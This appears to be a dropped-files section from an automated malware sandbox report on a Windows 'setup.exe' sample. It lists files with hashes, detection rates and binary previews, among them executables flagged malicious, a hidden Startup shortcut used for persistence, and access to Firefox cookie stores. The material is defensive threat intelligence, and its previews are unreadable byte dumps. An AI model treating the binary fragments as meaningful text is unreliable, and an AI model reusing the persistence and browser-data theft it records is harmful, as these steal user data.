Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......K.fp.e.#.e.#.e.#.7.#.e.#.7.#ce.#.7.#.e.#..#.e.#.e.#.d.#...#.e.#...#.e.#Rich.e.#........PE..L.....Ga..................... `...................@...........................k.......j...@...................................j...............................j..4....................................i.@.............j..............................text.............................. ..`.data...L._......\|_.................@....idata........j......&j.............@..@.ZkClh........j......Bj.............@....reloc...4....j..6...Nj.............@..B................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\7zS1BC9.tmp\Install.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\7zSA35.tmp\Install.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	6998528
Entropy (8bit):	7.768520015268181
Encrypted:	false
SSDEEP:	196608:SCv+HgNF6eJ//ullmSLZb7qRZlVqxlpo55IZVLTtXRr:0+ZXymSdq3l49o4fLTtB
MD5:	84DA5FC2F43E551848349F0D0D3FACA4
SHA1:	CF0078C71FB1EF9743451B6A20D9AA0306E697DB
SHA-256:	1989CB898E0E397B9ACC16C453C94CF3F1873573979D36873182B18B8DA86938
SHA-512:	9A605654C70DC27AE52760B2CED4AA3EEDDA6E98919EF96D9615C754F07E12C1748F6F978FFC916CB693E7788B21DC101A2442E3251F9A598AA223D9EAD238BD
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 50%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......=\|`.y...y...y...tO..g...tO......tO.........p...y...u.............x...Richy...........PE..L....7.a......................`.....K.............@..........................@k.....C.k...@...................................j.d.............................k.P6...................................Dj.@.............j..............................text...#........................... ..`.data...._......v_.................@....idata..\|.....j......lj.............@..@.oPCw.........j.......j.............@....reloc..P6....k..8....j.............@..B................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\7zSA35.tmp\Install.exe

Download File

Process:	C:\Users\user\Documents\SimpleAdobe\kUJOpvLlbhqCDkTlllfRFIPb.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	6693091
Entropy (8bit):	7.996153261816478
Encrypted:	true
SSDEEP:	196608:91OjTrIzizQJMkn76QCMRFyU9EhAxoP3I7vLl6:3Ovr8iQR7xHR4U9E/QvQ
MD5:	B3120D636B76D400397F33F9475EBBDF
SHA1:	204B8578CE8D403FF2A12451F163C454BFB4F356
SHA-256:	964EF3AE82FC24718DD877EBB38904B2BA4C54D7AF21382995742B6595D3B0A0
SHA-512:	8CDFF2AE1C2FCBD424D6D35AA41D92B04EA059EC81CCE2802988721FA673112C86FA74F7797F5CEE62535017BBA7B55C526B2E9FD3B779450D076413AC9A8701
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........W..s...s...s...}...s...y..s...,...s...r.!.s.......s...x..s.......s.......s.^.u...s.Rich..s.........PE..L....S.L.............................K............@.............................................................................d....p..`............................................................................................................text.............................. ..`.rdata...D.......F..................@..@.data...HZ.......2..................@....sxdata......`......................@....rsrc...`....p......................@..@................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\7zSA35.tmp\data\config.txt

Download File

Process:	C:\Users\user\Documents\SimpleAdobe\kUJOpvLlbhqCDkTlllfRFIPb.exe
File Type:	data
Category:	dropped
Size (bytes):	776893
Entropy (8bit):	7.999761608124172
Encrypted:	true
SSDEEP:	12288:hELw71jrF0BSQzD8k6Bnq0lRbsDEeIRctvkMQJOaSuGTv7mzXmxQfxUWkvmIEIvC:hv7RySc43Bnq0YDgcBkrpNGTY4FFPBqv
MD5:	BBDC1BD40FBD9E72879050B6DB3B36B9
SHA1:	DCA0340DEFE29DAFD52E6C7B9551CE9B48734B3A
SHA-256:	1A35B30D6BC0BE667DAA4FEC26B7B4FC90433F2E2895CE23D428C98970F9302C
SHA-512:	5DB312470D3C0EE6B4F70675FC597E70B8DD54E4CCA2D06D9A1EDAE6468568D845DAC552AF819D29B4E8471919D877101AA550D1E4AD404BDD687598338CF3D4
Malicious:	false
Preview:	6.....fV..u.C-_....l\|.@u...t...we...H6.F...o@.E<.......yi./.b}....t...............p.}...pp..f....H= ....`.....O...^(1.#H9Y.."._l.W..r.!.._.t..........'7@'.o=..).z......rW...../z.:.\|..A;.?C...J4.E.B......l)..B..2\|..A7......>..O.(s..s......:.H..BQ...W.n..#........3ha-.H..K>$2sT.W..e..CK....Cn....U..:e..uL.....{.. ...xc&.8..K...Zw.)....D).J.S.h7........F..i..n..y..`d...E.h..d.N+.U...-.j.B...0....+.G.A.Y...vA..Eb..6~.>...-...+1..(.6..Y.E...8.}.l..~qA....uI.f:.q.7.S..'......./(<.M..]c.#...bB./%...}...~;<....(A..DV......ME....J..\|..L^ .....rF(.$.'~.mfQ F....2.....Y.Q..]D..uYu@:B..t.{J9.#.U..3...C....w..(8.K..au.wa.{t.......`..j.XBj9).........c.....%k...........&.8.#W..`R...J V....L.?..~....m....;M..."Z.8.=.......=j.B.<..]A....b..%9bB.,..I..Hd-Nl5..>...2.G....$(m1q..4$..$0.=.+ ....m.4.,.HeB.:...=....M...R...:.y.A.&6.Ld.S.cE.....`..K..I-..f....s.Q...'m...}.qxbxL}NB.....'.......c;>.......f\|..n..h&.;..4.5oJ<.6..q.1....p.at...V.(G.o.-.\|.DJ..ZY....

C:\Users\user\AppData\Local\Temp\7zSAB2.tmp\Install.exe

Download File

Process:	C:\Users\user\Documents\SimpleAdobe\alXewrRe7Pi_SQbFkI0y1vcR.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	6678978
Entropy (8bit):	7.996078588464978
Encrypted:	true
SSDEEP:	196608:91OvT073RDp7UQA8ecvzn2eMYW+XbBRvdw:3OL07htQh3srW+Xb/C
MD5:	5FA0CB47D0F8879A4ABD65363062A198
SHA1:	FA0C042BB5644B54C8B69301090E3831949054E2
SHA-256:	7945575FABF4E4CE4A956BDDB6886A3A0F0AA9FA470BE30EDC7C80EBE17ACAAF
SHA-512:	60875F51630E9BC421C883F3945031F9E105A0E2F8ABA6BF7BEEF3FF597D3A83477C72D0ABDCD09B5BA6A46875057123D165E9B2F2350821A7E4FA4766F741F2
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........W..s...s...s...}...s...y..s...,...s...r.!.s.......s...x..s.......s.......s.^.u...s.Rich..s.........PE..L....S.L.............................K............@.............................................................................d....p..`............................................................................................................text.............................. ..`.rdata...D.......F..................@..@.data...HZ.......2..................@....sxdata......`......................@....rsrc...`....p......................@..@................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\7zSAB2.tmp\data\config.txt

Download File

Process:	C:\Users\user\Documents\SimpleAdobe\alXewrRe7Pi_SQbFkI0y1vcR.exe
File Type:	data
Category:	dropped
Size (bytes):	774644
Entropy (8bit):	7.999792830742924
Encrypted:	true
SSDEEP:	12288:pR/Bu8RJhYmVbMy6JEvhPjNDlXJHk4kVG9Z9vO7l16COcA4/IWlV+q52oZ:pLhLtMGZplxZEKycj4QaY42s
MD5:	F1E6379424FFC6AA4C6020A20747CE34
SHA1:	8C220B30D4E3140FA22D9F963ED50D6069D66098
SHA-256:	970F8C22901C5A9D5B27247E97FC8378C01941643B83967854754650672D8247
SHA-512:	D9D819F8A3C7E363EFE5108BF1837037885897D60A4C1DDA53BC4BB1006B8099B489B55F90775850698520B592E6B8E76A07AAFF7A2AB003B691484914944270
Malicious:	false
Preview:	.....0[t.-.(0&.}3C_..f..H[..I....9.).L.E.(I...Hb.&...........A....q.3..L.....{2(.WO./...a....c..vXM[.y.~IGr..Z.eU.:..z.N.F1.+.Z \.t9.....;u..M.v....{?....j...h..zC...x..m(........0.....^..8.)../...[n..f.E....bw\|R3....).....#.6....!R...NNjD....0k.9...8h.....N.}A?.!#Z'tY..A.Z.....F.)......J......sx..n.N...8...[.0.Gv&...f.......:9/.M!<G...9..:q.:...h".u...H..5..#...{.sg.z..V..4..s.....WfF.l5...8p3I2..t.Y....u..8.8..F/.;.`..Z$....V....w.#...E.4.. p.Ap..ro..O....Ca.e...L/.......^..uzB..........S...E....s...........e..(...Z..r.>.Q.<..8....!.J.\|;....od.Ql....1A....\1.(ShIR.... ...G.b..z...c.$.B.\..I..`...(..aO..,..>...p.t...).@{l...........$...:...o.e._....M5...9....l.z.....e...{........`}L.@......'..1:\|X......O.L....b....w..K..&..}.HOj.......%`.o~v.rH.wH4..]....I...8.gxk.-.]..jP]## f.Z.<F2R.%k........6I......[..>.{}`...D.,..S...t....eY...(.....zl.p.\..Q..?.Uc..wEe....y~.2y2."f.I.<..[.1..s#.7..ID.a.A..b6q.y".r\>Fv..

C:\Users\user\AppData\Local\Temp\AAAAKJKJEB.exe

Download File

Process:	C:\Users\user\Documents\SimpleAdobe\Lbg6Jgx2PuK0JimgGIFCI5UU.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1874432
Entropy (8bit):	7.9488539085621035
Encrypted:	false
SSDEEP:	49152:H9SVwma2ZsKjPkojbWQfH5KsqL2dP5yERwxfdqsot:HMKmaWL/WQfgsquY1G
MD5:	C773435D58037DE4E60797EA452B55D9
SHA1:	7F5229FCD5F0C3C42FB46193077CD92F1B748B82
SHA-256:	F87C35723547904BE1AA9F50D6FAD27D19B149CDE6714BC978A689D98399B799
SHA-512:	D006B3BE5B728ECB5664CA9DAEAB5E20680E0AF107D51A9FC831B617DDEA04A06F915D278DF72EAF7B8830A059098DA107298877917546929676691F9E56A691
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........PJ.r>..r>..r>...=..r>...;.(r>.].:..r>.].=..r>.].;..r>...:..r>...?..r>..r?.^r>...7..r>......r>...<..r>.Rich.r>.................PE..L.....af.............................PJ...........@...........................J.....`.....@.................................X...l...........................\|<J.............................,<J..................................................... . ............................@....rsrc...............................@....idata ............................@... ..*.........................@...jkbeubqv......0.....................@...ybbtgqtz.....@J......r..............@....taggant.0...PJ.."...x..............@...........................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\PowerExpertNT\PowerExpertNT.exe

Download File

Process:	C:\Users\user\Documents\SimpleAdobe\IVTULQzdBmF3Bc0NeoxSnYvg.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	3828752
Entropy (8bit):	7.950185500817205
Encrypted:	false
SSDEEP:	98304:rm3o0QMznQ6mUOAj4H0KikjBY5fgq/crZN:GmMzQ6eAj4HbjBOIkS
MD5:	2AB891D9C6B24C5462E32A0BAB3D1FEC
SHA1:	4DBB387D2FCE2B47FF3699468590466505BA7554
SHA-256:	6FFD157EB781504EADD72996C2CDBD4881034FFB7F7D2BC4B96D4DAA61FB4D86
SHA-512:	0317A30E9E70D0AC8416F14A91119504FC40E9A72EE34D358741EBF820367ABB3B18E2C64987F6D86D3C4A8952621AEBECA83FA027D66EDB456C749E56D42D89
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 62%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........&...u...u...u...t...u...t%..u%C.u...u%C.t...u%C.t...u%C.t...u...t...u...t...u...t...u...u}..u.@.t...u.@.u...u.@.t...uRich...u........................PE..L...r*~f...............'.....j......X h...........@.................................z:...@......................................................................................................................................................... {........................... ..` .r..........................@..@ .&...p......................@... ............................@..@ .A...0...0..................@..B.idata..............................@....tls.....................................rsrc...............................@..@.themida..W.........................`....boot.....0.. h...0.................`..`.reloc...............l:................@................................

C:\Users\user\AppData\Local\Temp\is-5JVP5.tmp\H1pBxuA3W1wJGbhYT2DZXaLH.tmp

Download File

Process:	C:\Users\user\Documents\SimpleAdobe\H1pBxuA3W1wJGbhYT2DZXaLH.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	696832
Entropy (8bit):	6.464583796559112
Encrypted:	false
SSDEEP:	12288:q0QfKb7nH5lrPo37AzHTA63I0ihE4aEJOrNv4gM/RelAseY/XExy8:qfKbT5lrPo37AzHTA63/cfa74F0lAi/0
MD5:	6F995E2D6C8D0D1D03CB3AFCD1DEAFAF
SHA1:	0319DBD8C7B44067B82FED5272059757A526B3AA
SHA-256:	CC4530FEE96CF6E821FA1DBED0C46AC5310C57D6336999E3F93D29F78376F9EB
SHA-512:	207B4D327BE81E71152CE35CB272362E9862E6002A6C01E9E9DF37578C3764AC1C8D19B19E8E3B751162724490F06FEA10611D7BECABAFF3863AF993A90DB16D
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 3%
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B.................&...........2.......@....@..............................................@...............................%...`...>..........................................................................................................CODE.....$.......&.................. ..`DATA....<....@.....................@...BSS..........`.......<...................idata...%.......&...<..............@....tls.................b...................rdata...............b..............@..P.reloc..............................@..P.rsrc....>...`...>...d..............@..P.....................*..............@..P........................................................................................................................................

C:\Users\user\AppData\Local\Temp\is-T7UO2.tmp\_isetup\_RegDLL.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-5JVP5.tmp\H1pBxuA3W1wJGbhYT2DZXaLH.tmp
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.026670007889822
Encrypted:	false
SSDEEP:	48:ivuz1hEU3FR/pmqBl8/QMCBaquEMx5BC+SS4k+bkguj0KHc:bz1eEFNcqBC/Qrex5iSKDkc
MD5:	0EE914C6F0BB93996C75941E1AD629C6
SHA1:	12E2CB05506EE3E82046C41510F39A258A5E5549
SHA-256:	4DC09BAC0613590F1FAC8771D18AF5BE25A1E1CB8FDBF4031AA364F3057E74A2
SHA-512:	A899519E78125C69DC40F7E371310516CF8FAA69E3B3FF747E0DDF461F34E50A9FF331AB53B4D07BB45465039E8EBA2EE4684B3EE56987977AE8C7721751F5F9
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.....................H................\|.......\|.......\|......Rich............PE..L....M;J..................................... ....@..........................@..............................................l ..P....0..@............................................................................ ..D............................text............................... ..`.rdata....... ......................@..@.rsrc...@....0......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\is-T7UO2.tmp\_isetup\_iscrypt.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-5JVP5.tmp\H1pBxuA3W1wJGbhYT2DZXaLH.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2560
Entropy (8bit):	2.8818118453929262
Encrypted:	false
SSDEEP:	24:e1GSgDIX566lIB6SXvVmMPUjvhBrDsqZ:SgDKRlVImgUNBsG
MD5:	A69559718AB506675E907FE49DEB71E9
SHA1:	BC8F404FFDB1960B50C12FF9413C893B56F2E36F
SHA-256:	2F6294F9AA09F59A574B5DCD33BE54E16B39377984F3D5658CDA44950FA0F8FC
SHA-512:	E52E0AA7FE3F79E36330C455D944653D449BA05B2F9ABEE0914A0910C3452CFA679A40441F9AC696B3CCF9445CBB85095747E86153402FC362BB30AC08249A63
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........W.c.W.c.W.c...>.T.c.W.b.V.c.R.<.V.c.R.?.V.c.R.9.V.c.RichW.c.........................PE..L....b.@...........!......................... ...............................@......................................p ..}.... ..(............................0....................................................... ...............................text............................... ..`.rdata....... ......................@..@.reloc.......0......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\is-T7UO2.tmp\_isetup\_setup64.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-5JVP5.tmp\H1pBxuA3W1wJGbhYT2DZXaLH.tmp
File Type:	PE32+ executable (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	6144
Entropy (8bit):	4.215994423157539
Encrypted:	false
SSDEEP:	96:sfkcXegaJ/ZAYNzcld1xaX12pS5SKvkc:sfJEVYlvxaX12EF
MD5:	4FF75F505FDDCC6A9AE62216446205D9
SHA1:	EFE32D504CE72F32E92DCF01AA2752B04D81A342
SHA-256:	A4C86FC4836AC728D7BD96E7915090FD59521A9E74F1D06EF8E5A47C8695FD81
SHA-512:	BA0469851438212D19906D6DA8C4AE95FF1C0711A095D9F21F13530A6B8B21C3ACBB0FF55EDB8A35B41C1A9A342F5D3421C00BA395BC13BB1EF5902B979CE824
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d...XW:J..........#............................@.............................`..............................................................<!.......P..@....@..0.................................................................... ...............................text............................... ..`.rdata..\|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...@....P......................@..@................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\is-T7UO2.tmp\_isetup\_shfoldr.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-5JVP5.tmp\H1pBxuA3W1wJGbhYT2DZXaLH.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	23312
Entropy (8bit):	4.596242908851566
Encrypted:	false
SSDEEP:	384:+Vm08QoKkiWZ76UJuP71W55iWHHoSHigH2euwsHTGHVb+VHHmnH+aHjHqLHxmoq1:2m08QotiCjJuPGw4
MD5:	92DC6EF532FBB4A5C3201469A5B5EB63
SHA1:	3E89FF837147C16B4E41C30D6C796374E0B8E62C
SHA-256:	9884E9D1B4F8A873CCBD81F8AD0AE257776D2348D027D811A56475E028360D87
SHA-512:	9908E573921D5DBC3454A1C0A6C969AB8A81CC2E8B5385391D46B1A738FB06A76AA3282E0E58D0D2FFA6F27C85668CD5178E1500B8A39B1BBAE04366AE6A86D3
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......IzJ^..$...$...$...%.".$.T87...$.[."...$...$...$.Rich..$.........................PE..L.....\;...........#..... ...4.......'.......0.....q....................................................................k...l)..<....@.../...................p..T....................................................................................text...{........ .................. ..`.data...\....0.......&..............@....rsrc..../...@...0...(..............@..@.reloc.......p.......X..............@..B................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpSTLpopstart\stlmapfrog

Download File

Process:	C:\Users\user\Documents\SimpleAdobe\IVTULQzdBmF3Bc0NeoxSnYvg.exe
File Type:	data
Category:	dropped
Size (bytes):	75
Entropy (8bit):	4.728772110975642
Encrypted:	false
SSDEEP:	3:7OoQGlhWhUbvYoQGlzVStgh:rQoAUBQoZS+
MD5:	46D48A4F0DFDCCD48632960C4D0563A6
SHA1:	EDC209AE60954B27118BF05173E813A43E5286D3
SHA-256:	882188F2098DC296078ECA97A44D38BAFB3F25C40F0A255A4135C1051258837B
SHA-512:	22B44181E892040417F4F48873AB161CA79ABE17AE926FE599ABE97A61E724A4D85D0A553949B708A715E6EEA967963B71D65A26064EBB6983E1A3E6E96683E2
Malicious:	false
Preview:	.sYYYY[....5.......0)[CY[AWMOWHKJWJJ[.sYYYY[....5.......-...[CYHNH@ANHLKAs.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\PowerExpertNT.lnk

Download File

Process:	C:\Users\user\Documents\SimpleAdobe\IVTULQzdBmF3Bc0NeoxSnYvg.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Hidden, Archive, ctime=Mon Jul 1 21:05:26 2024, mtime=Mon Jul 1 21:05:26 2024, atime=Mon Jul 1 21:05:15 2024, length=3828752, window=hide
Category:	dropped
Size (bytes):	1241
Entropy (8bit):	4.9130894119242505
Encrypted:	false
SSDEEP:	24:8SDaDolXSXKRbgKb8eGT9BvyJAkanYjAW4H4mRS3r32qygm:8SDaDoliaREvT9fB6byg
MD5:	5FF066A736E43E7DC1F5DB04F2049250
SHA1:	A50AA40EE78D60D09BCEEEFFF150D02556C72F9D
SHA-256:	B172DD8A16C34CFF1D9766CFA9BCD74AAD3776E4603685F4D0C3B8FCE7A5CDB0
SHA-512:	783FEA564560CA8EFABBB684D51B86FDC5735A90650CBA6D5255366A7A42F6FB49B0D56CCB261A5BEECBC1F8A2544AA9685FE18111FAAA0DBEA91247335A5ED2
Malicious:	false
Preview:	L..................F....".....1.......1......<[......l:.....................0.:..DG..Yr?.D..U..k0.&...&.......$..S...\|3z.....e.}.........t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2.X.............................^.A.p.p.D.a.t.a...B.P.1......X....Local.<......EW<2.X......[.....................}.".L.o.c.a.l.....N.1......X....Temp..:......EW<2.X......^.....................-6..T.e.m.p.....d.1......X....POWERE~1..L.......X...X.............................r..P.o.w.e.r.E.x.p.e.r.t.N.T.....p.2..l:..X..".POWERE~1.EXE..T.......X...X............................0...P.o.w.e.r.E.x.p.e.r.t.N.T...e.x.e.......s...............-.......r............%.......C:\Users\user\AppData\Local\Temp\PowerExpertNT\PowerExpertNT.exe....P.o.w.e.r.E.x.p.e.r.t.N.T.<.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.P.o.w.e.r.E.x.p.e.r.t.N.T.\.P.o.w.e.r.E.x.p.e.r.t.N.T...e.x.e.........\|....I.J.H..K..:...`.......X.......651689...........hT..CrF.f4... ..,..Jc...-...-$..hT..

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite-shm

Download File

Process:	C:\Users\user\Documents\SimpleAdobe\Lbg6Jgx2PuK0JimgGIFCI5UU.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.017262956703125623
Encrypted:	false
SSDEEP:	3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
MD5:	B7C14EC6110FA820CA6B65F5AEC85911
SHA1:	608EEB7488042453C9CA40F7E1398FC1A270F3F4
SHA-256:	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
SHA-512:	D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
Malicious:	false
Preview:	..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite-shm

Download File

Process:	C:\Users\user\Documents\SimpleAdobe\Lbg6Jgx2PuK0JimgGIFCI5UU.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.017262956703125623
Encrypted:	false
SSDEEP:	3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
MD5:	B7C14EC6110FA820CA6B65F5AEC85911
SHA1:	608EEB7488042453C9CA40F7E1398FC1A270F3F4
SHA-256:	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
SHA-512:	D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
Malicious:	false
Preview:	..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\Documents\SimpleAdobe\01dIFB7Hn9Ga_GV72pHGpcce.exe

Download File

Process:	C:\Users\user\Desktop\1719859269.0326595_setup.exe
File Type:	HTML document, ASCII text, with very long lines (6927)
Category:	dropped
Size (bytes):	504872
Entropy (8bit):	5.3709609118067325
Encrypted:	false
SSDEEP:	12288:na/Eq7ktwIB8rIwJ0rAmv8yahDwao/pCBpdwqM0eulJvBnI76j/:n8EqMahDdQCBpdwqM0eulN3
MD5:	642A6204B046786E1D954CF32100416F
SHA1:	64DA96AE1F9B59CD842EBEAE373BAA1C2FD856FE
SHA-256:	B6086F281F3F207C2D5842F004F7ED22B197F4D4D2BEBFA0A2F886173486DA50
SHA-512:	E152F28154238E1780B2725C27015E917E8AE997FCDB6FCF3DFE977E1A1046D73DAA49C5614D6669408BCC37AB9D5CC7C94B5EB4D1CDFC0BA4010D208A04A7B9
Malicious:	false
Preview:	<!DOCTYPE html>.<html lang='en' dir='ltr'>.<head>.<meta http-equiv="X-UA-Compatible" content="IE=edge" />..<link rel="preconnect" href="https://login.vk.com" />.<link rel="preconnect" href="https://api.vk.com" />.<link rel="shortcut icon" href="/images/icons/favicons/fav_logo.ico?7" />..<link rel="apple-touch-icon" href="/images/icons/pwa/apple/default.png?15">..<meta http-equiv="content-type" content="text/html; charset=windows-1251" />.<meta http-equiv="origin-trial" content="AiJEtxZTdbmRu3zkrD0Bg/GvReuip5r0aklN7tIrw1Yit01/+j7PNlJFAyMMo/vqqNVvDmRsGCPGfVtNn5ookQ8AAABueyJvcmlnaW4iOiJodHRwczovL3ZrLmNvbTo0NDMiLCJmZWF0dXJlIjoiRG9jdW1lbnRQaWN0dXJlSW5QaWN0dXJlQVBJIiwiZXhwaXJ5IjoxNjk0MTMxMTk5LCJpc1N1YmRvbWFpbiI6dHJ1ZX0="><meta name="theme-color" content="#ffffff">.<meta name="color-scheme" content="light">..<title>Error \| VK</title>..<noscript><meta http-equiv="refresh" content="0; URL=/badbrowser.php"></noscript>.<script nomodule>(function(){"use strict";function e({needRedirect:e}){const

C:\Users\user\Documents\SimpleAdobe\4MZEKMRe7m6bc8qivCccLsq8.exe

Download File

Process:	C:\Users\user\Desktop\1719859269.0326595_setup.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	2776576
Entropy (8bit):	7.649061830319207
Encrypted:	false
SSDEEP:	49152:bO36hw8/EKN8QEhC75prLQPZwu6mKBxwlHvF5JpAk5SYLSdlYzae1NM2G:bO36q8sxDhGJExftJfJO0jtG
MD5:	520F92170A2CF78ED3152F83973B9B66
SHA1:	C6F979D3F405D1E9527566A9CC763DC2560EE39C
SHA-256:	63F33FC0DA67B18A2A5D75D5509D7AEE76F5B2BDC94AB5AEAD8AC09A91B0DA01
SHA-512:	66D4C23CC9D276B947BCE13C6089CA9676E30E1DB07013B2144D2534728E8ACE07AB3456CB66824416BA1F314F998BE62A3479DDA3143DD21D7778CE303846A7
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 62%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...`..f..................%..r......N.&.. ... &...@.. ..................................@...................................&.K....@&..l.......................... &.............................................. ............... ..H............text...T.%.. ....%................. ..`.sdata..8.... &.......%.............@....rsrc....l...@&..n....%.............@..@.reloc..............\*.............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\Documents\SimpleAdobe\4Q6k8SlqG7M24bYO3UgMWICf.exe

Download File

Process:	C:\Users\user\Desktop\1719859269.0326595_setup.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	957440
Entropy (8bit):	7.29740036425901
Encrypted:	false
SSDEEP:	24576:j+qodQCtw8QEZWBiMUp736I5Zqi7P2XZtXtW/Di:iw8QEZWBTXSZqiz2XvXQm
MD5:	75A2D212A591A83A4D0C88A92B390B88
SHA1:	8F69B79A0D6BC6B4DEF35B38EC46D15E6EB1C1D9
SHA-256:	CF47A943EC0EB86C16A8D7E6E0AD8C4BFB6063AF089E1B3809ED44AC45347E71
SHA-512:	E7242EF4042F96743A6F999BEE1A5EE93A88A6AA83385A28D2B868BD2C2F6734C0BC9192059E5A7862CFF747A4DEE8A16E9AC10CB659CBD2F05A4A040DD05A47
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 37%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........x...+...+...+z.....+z.....+z.....+k\....+k\....+z.....+...+)..+k\....+Z_....+Z_....+Z_....+Rich...+........................PE..L....o.f...............'.h...J....................@.......................................@.............................H......P................................J...)..T............................(..@............................................text....V.......X.................. ..`.bss....}....p.......\.............. ..`.rdata..4............l..............@..@.data...............................@....reloc...J.......L...P..............@..B................................................................................................................................................................................................................................................................................................

C:\Users\user\Documents\SimpleAdobe\H1pBxuA3W1wJGbhYT2DZXaLH.exe

Download File

Process:	C:\Users\user\Desktop\1719859269.0326595_setup.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	5391535
Entropy (8bit):	7.998995585318719
Encrypted:	true
SSDEEP:	98304:CEYQC32wcQ37FUnAh6faD0bIdGFqC21B5oVfQWcl2+tUQxy:VYDPl3CVaD0ctCWjoV7TiUQE
MD5:	CD591EBEF2FB36E6D0C67B0237D3B1BE
SHA1:	2BEA8EAA1E588A0F7FC3A73044D7B10A43659441
SHA-256:	451E864C9675147A8FAECA70522EFBCFF3B8B573B51D321D978DD57CFB16D419
SHA-512:	29CCD09717FE83C8D7DDDAE145A4A446550A3A6C7A7656A1CD9ADD832D8003177E4D73DF23047E45C7A1950434549C1D9F4756F8D1B7F537675F9B8880F5CE7C
Malicious:	true
